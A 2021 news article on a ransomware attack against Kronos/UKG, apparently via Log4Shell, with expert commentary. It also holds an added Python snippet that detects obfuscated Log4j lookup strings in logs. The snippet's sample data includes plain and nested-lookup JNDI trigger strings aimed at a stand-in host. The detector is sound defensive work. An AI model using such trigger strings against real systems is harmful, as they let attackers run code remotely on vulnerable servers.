UPDATED 22:30 EDT / DECEMBER 13 2021

SECURITY

Ransomware strikes workflow solutions provider Kronos via suspected Log4shell exploit

A ransomware attack has struck workflow management solutions provider Kronos Inc. and knocked services offline.

UKG Inc., the parent company of Kronos, said today that the ransomware attack could result in its services being out for “several weeks.” The company even suggested that its customers should seek other ways to facilitate payroll payments and human resources-related activities.

Notable Kronos customers include Tesla Inc., Marriott International Inc., Yamaha Corp., Aramark Corp., Samsung Electronics Co. Ltd. and Sony Music Entertainment.

The ransomware attack specifically targeted the Kronos Private Cloud. The attack also knocked offline UKG Workforce Central, UKG TeleStaff, Healthcare Extensions and Banking Scheduling Solutions.

“At this time, we still do not have an estimated restoration time, and it is likely that the issue may require at least several days to resolve,” UKG said in a community post. “We continue to recommend that our impacted customers evaluate alternative plans to process time and attendance data for payroll processing, to manage schedules and to manage other related operations important to their organization.”

Kronos did not reveal the form of ransomware involved in the attack. Although the company did not provide details, reports suggest that the ransomware attack exploited a Log4shell vulnerability. The Log4shell vulnerability is related to the broad Log4j vulnerability gaining headlines over the last few days.

Ars Technica noted today that Kronos’ cloud services rely heavily on Java, the programming language and runtime platform that Log4j is built on. The Log4Shell vulnerability allows attackers to run malicious code with elevated system privileges and is described as trivially easy to exploit.

The Log4j vulnerability is a flaw in the popular open-source logging library used to record diagnostic data from applications written in the Java programming language.

“With the Log4j vulnerability impacting many internet-facing systems, Kronos/UKG may be old news soon,” James Shank, senior security evangelist and chief architect of community services at threat intelligence company Team Cymru Inc., told SiliconANGLE. “There are already reports of a variety of actors using the Log4j exploit. Microsoft has already seen a common precursor to ransomware, Cobalt Strike, landing on Log4j exploited systems. It won’t be long before we hear of ransomware events tied to Log4j as the initial vector.”

Michael Assraf, chief executive officer of vulnerability remediation company Vicarius Ltd., noted that the way modern products are built is by using a big hierarchy of dependencies. That means developers use libraries written by third-party companies and engineers to speed up the software release process.

Assraf said Log4j is an extremely basic library that allows log writing in Java applications. The way the Log4j vulnerability works is that it comes in three layers: cloud products that directly use Log4j, web applications that use libraries employing Log4j and off-the-shelf software that’s internally deployed on customer servers and endpoints. The first is where Kronos has been hit by ransomware.

Kronos could be one of many companies to come. Paul Ducklin, principal research scientist at security software company Sophos group plc, said there’s a “staggering number of different ways that the Log4Shell ‘trigger text’ can be encoded, the huge number of different places in your network traffic that these strings can appear, and the wide variety of servers and services that could be affected are collectively conspiring against all of us.”
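As an added illustration of the detection problem Ducklin describes (this is example code written for this page, not code from the article, Sophos or Kronos), the following Python collapses Log4j-style `${...}` lookups in constructed sample log lines before checking for the JNDI trigger, so that case-conversion and default-value encodings of the same string converge on one plain form. The hostnames and log lines are constructed; the lookup forms handled (`lower`, `upper` and the `:-` default syntax) are the documented Log4j ones, not an exhaustive list of every encoding.

```python
import re

# Constructed sample log lines (not taken from the article): a benign request,
# a plain JNDI lookup string, a nested-lookup variant of the same string, and a
# harmless lookup that must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:J}ndi:${upper:ldap}://example.invalid/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${date:yyyy-MM-dd}"',
]

# Matches an innermost ${...} lookup: a body with no nested "${", "{" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve_one(body: str) -> str:
    """Reduce one lookup body to the literal text it would expand to.

    Only the case-conversion and default-value forms are modelled; any other
    lookup (date, env, ...) is kept as its body text so the surrounding string
    can still be inspected without expanding further.
    """
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    # ${name:-default}: an unresolvable name yields the default branch, which
    # is the text a logger would actually emit.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return body


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse lookups innermost-first until the text stops changing.

    The round limit bounds work on pathological input; after it, whatever is
    left is returned as-is.
    """
    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_suspicious(line: str) -> bool:
    """True when a line carries a lookup that normalizes to a JNDI prefix."""
    return "${" in line and "jndi:" in normalize(line).lower()


def scan(lines):
    """Return the lines from an iterable of log records that should be reviewed."""
    return [line for line in lines if is_suspicious(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print("REVIEW:", hit, "->", normalize(hit))
```

Running the block prints the two constructed JNDI lines in their normalized form; the benign request and the `${date:...}` lookup are not reported. Matching on the normalized text rather than on the raw string is the point: a rule that looks only for the literal `${jndi:` misses the second variant, whereas both variants reduce to the same `jndi:` prefix here.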

Even organizations with the best of intentions, including serious deployment of cybersecurity measures, are exposed: Log4shell is so serious because it bypasses many traditional protection solutions.

“Although Kronos Private Cloud was secured by firewalls, encrypted transmissions and multifactor authentication, cybercriminals were still able to breach and encrypt its servers,” explained Nick Tausek, security solutions architect at security automation company Swimlane Inc. “This extended shutdown will likely present challenges for many organizations as they seek to roll out bonuses and employees look to request time off ahead of the holidays.”

Photo: Pkonradk/Wikimedia Commons
